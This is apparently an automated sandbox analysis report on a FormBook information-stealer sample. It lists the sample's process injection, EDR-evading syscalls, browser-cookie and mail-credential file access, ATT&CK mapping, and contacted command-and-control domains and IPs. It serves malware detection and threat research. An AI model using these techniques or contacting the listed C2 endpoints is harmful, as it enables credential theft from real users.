                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 5096Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\01152-11-12-24.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C0F008Jump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009487B1 LogonUserW,0_2_009487B1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008F3B3A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008F48D7
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00954C27 mouse_event,0_2_00954C27
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"Jump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00947CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00947CAF
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0094874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0094874B
                Source: 01152-11-12-24.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 01152-11-12-24.exe, hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091862B cpuid 0_2_0091862B
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00924E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00924E87
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00931E06 GetUserNameW,0_2_00931E06
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00923F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00923F3A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008F49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 01152-11-12-24.exeBinary or memory string: WIN_81
                Source: 01152-11-12-24.exeBinary or memory string: WIN_XP
                Source: 01152-11-12-24.exeBinary or memory string: WIN_XPe
                Source: 01152-11-12-24.exeBinary or memory string: WIN_VISTA
                Source: 01152-11-12-24.exeBinary or memory string: WIN_7
                Source: 01152-11-12-24.exeBinary or memory string: WIN_8
                Source: 01152-11-12-24.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00966283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00966283
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00966747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00966747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573117 Sample: 01152-11-12-24.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 28 www.prestigerugz.info 2->28 30 www.ontherise.top 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 10 01152-11-12-24.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 hKAQraLbCUKXj.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 tzutil.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 hKAQraLbCUKXj.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 taxitayninh365.site 103.75.185.22, 49988, 49989, 49990 VNBOOKING-AS-VNVietNamBookingcorporationVN Viet Nam 22->34 36 www.prestigerugz.info 217.160.0.113, 49859, 49868, 49874 ONEANDONE-ASBrauerstrasse48DE Germany 22->36 38 5 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                01152-11-12-24.exe45%ReversingLabsWin32.Trojan.AutoitInject
                01152-11-12-24.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.75178.club/q34f/0%Avira URL Cloudsafe
                http://www.taxitayninh365.site/syud/0%Avira URL Cloudsafe
                http://www.ontherise.top0%Avira URL Cloudsafe
                http://www.prestigerugz.info/m5si/0%Avira URL Cloudsafe
                http://www.44ynh.top/l9wb/100%Avira URL Cloudmalware
                http://www.jijievo.site/521z/0%Avira URL Cloudsafe
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
                http://www.ontherise.top/wr6c/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                44ynh.top
                		38.181.21.178
                		truetrue
                  		unknown
                  all.wjscdn.com
                  		154.90.58.209
                  		truetrue
                    		unknown
                    www.prestigerugz.info
                    		217.160.0.113
                    		truetrue
                      		unknown
                      www.supernutra01.online
                      		104.21.24.198
                      		truefalse
                        		high
                        taxitayninh365.site
                        		103.75.185.22
                        		truetrue
                          		unknown
                          www.ontherise.top
                          		162.0.213.94
                          		truetrue
                            		unknown
                            gtml.huksa.huhusddfnsuegcdn.com
                            		23.167.152.41
                            		truefalse
                              		high
                              www.nb-shenshi.buzz
                              		161.97.168.245
                              		truefalse
                                		high
                                www.75178.club
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.setwayidiomas.online
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.jijievo.site
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.buckser.info
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.44ynh.top
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.taxitayninh365.site
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.prestigerugz.info/m5si/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.44ynh.top/l9wb/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.75178.club/q34f/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ontherise.top/wr6c/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jijievo.site/521z/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.taxitayninh365.site/syud/true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://ac.ecosia.org/autocomplete?q=tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/chrome_newtabtzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://kb.fastpanel.direct/troubleshoot/tzutil.exe, 0000000B.00000002.3118417486.0000000004304000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3120076643.0000000006800000.00000004.00000800.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035E34000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://www.litespeedtech.com/error-pagetzutil.exe, 0000000B.00000002.3118417486.0000000004E02000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.00000000038C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.ontherise.tophKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csstzutil.exe, 0000000B.00000002.3118417486.0000000004F94000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000003A54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                162.0.213.94
                                                                		www.ontherise.topCanada
                                                                		35893ACPCAtrue
                                                                217.160.0.113
                                                                		www.prestigerugz.infoGermany
                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                23.167.152.41
                                                                		gtml.huksa.huhusddfnsuegcdn.comReserved
                                                                		395774ESVC-ASNUSfalse
                                                                103.75.185.22
                                                                		taxitayninh365.siteViet Nam
                                                                		63762VNBOOKING-AS-VNVietNamBookingcorporationVNtrue
                                                                154.90.58.209
                                                                		all.wjscdn.comSeychelles
                                                                		40065CNSERVERSUStrue
                                                                38.181.21.178
                                                                		44ynh.topUnited States
                                                                		174COGENT-174UStrue
                                                                104.21.24.198
                                                                		www.supernutra01.onlineUnited States
                                                                		13335CLOUDFLARENETUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1573117
                                                                Start date and time:2024-12-11 15:01:36 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 24s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:17
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:01152-11-12-24.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@12/7
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 49
                                                                • Number of non-executed functions: 277
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: 01152-11-12-24.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                162.0.213.94DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • www.ontherise.top/wr6c/
                                                                New Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.inspireto.life/odi0/
                                                                Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                • www.oxilo.info/ve3g/
                                                                3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                • www.oxilo.info/ve3g/
                                                                PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                • www.syvra.xyz/h2bb/
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.kryto.top/09dt/
                                                                invoice.exeGet hashmaliciousFormBookBrowse
                                                                • www.syvra.xyz/h2bb/
                                                                r9856_7.exeGet hashmaliciousFormBookBrowse
                                                                • www.zimra.xyz/knrh/
                                                                PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                • www.syvra.xyz/h2bb/
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
